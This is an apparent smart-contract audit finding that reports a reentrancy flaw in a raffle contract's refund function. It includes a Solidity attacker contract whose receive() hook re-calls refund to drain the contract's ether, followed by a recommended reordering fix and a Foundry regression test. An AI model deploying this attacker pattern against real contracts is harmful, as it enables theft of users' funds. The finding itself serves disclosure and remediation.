Submission Details
Severity: high
Valid

Reentrancy attack on Refund

Summary

An attacker can re-enter the refund function because state is modified only after the funds have been sent.

Vulnerability Details

An attacker contract can implement its receive/fallback functions so that they call the refund function again, repeating until the raffle is fully drained.

Impact

The account will be drained.

Tools Used

interface IPuppyRaffle {
    function refund(uint256 playerIndex) external;
    function enterRaffle(address[] memory newPlayers) external payable;
    function getActivePlayerIndex(address player) external view returns (uint256);
    function selectWinner() external;
    function withdrawFees() external;
}

contract ReentrancyAttack {
    IPuppyRaffle public raffle;
    address[] private players;

    constructor(address _raffle) {
        raffle = IPuppyRaffle(_raffle);
    }

    receive() external payable {
        if (address(raffle).balance > 0) {
            raffle.refund(0);
        }
    }

    function startGame() external payable {
        players.push(address(this));
        players.push(...);
        raffle.enterRaffle{value: msg.value}(players);
        delete players;
    }

    function attack() external payable {
        raffle.refund(0);
    }
}

Recommendations

Delete the player from the players list before sending the ether back:

function refund(uint256 playerIndex) public {
    ...
    players[playerIndex] = address(0);
    payable(msg.sender).sendValue(entranceFee);
    ...
}
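
The recommended ordering as a Foundry regression test. This is an added example, not code from the submission or from PuppyRaffle: `MiniRaffle`, `ReentryProbe` and the test are hypothetical, the raffle is reduced to the refund path, and a plain `call` stands in for `sendValue`.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Hypothetical minimal raffle: only the entry and refund paths are modelled.
contract MiniRaffle {
    uint256 public constant entranceFee = 1 ether;
    address[] public players;

    function enter() external payable {
        require(msg.value == entranceFee, "wrong fee");
        players.push(msg.sender);
    }

    function refund(uint256 playerIndex) external {
        require(players[playerIndex] == msg.sender, "not the player"); // check
        players[playerIndex] = address(0);                             // effect
        (bool ok,) = payable(msg.sender).call{value: entranceFee}(""); // interaction
        require(ok, "refund transfer failed");
    }
}

// Test double whose receive() calls refund again while the first call is open.
contract ReentryProbe {
    MiniRaffle private immutable raffle;
    uint256 private index;
    constructor(MiniRaffle _raffle) { raffle = _raffle; }
    function enter() external payable { raffle.enter{value: msg.value}(); }
    function refund(uint256 i) external { index = i; raffle.refund(i); }
    receive() external payable { raffle.refund(index); }
}

contract RefundReentrancyTest is Test {
    function test_reentrantRefundReverts() public {
        MiniRaffle raffle = new MiniRaffle();
        ReentryProbe probe = new ReentryProbe(raffle);
        vm.deal(address(this), 2 ether);
        raffle.enter{value: 1 ether}(); // another player's deposit, index 0
        probe.enter{value: 1 ether}();  // probe's own entry, index 1

        // The nested refund fails the ownership check because the slot is
        // already cleared, so the transfer fails and the outer call reverts.
        vm.expectRevert(bytes("refund transfer failed"));
        probe.refund(1);
        assertEq(address(raffle).balance, 2 ether);
    }
}
```

With the slot cleared after the transfer instead, the nested call passes the ownership check and the same test fails, which makes it a useful guard against the ordering regressing.
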
Updates

Lead Judging Commences

Hamiltonite Lead Judge about 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

reentrancy-in-refund

reentrancy in refund() function
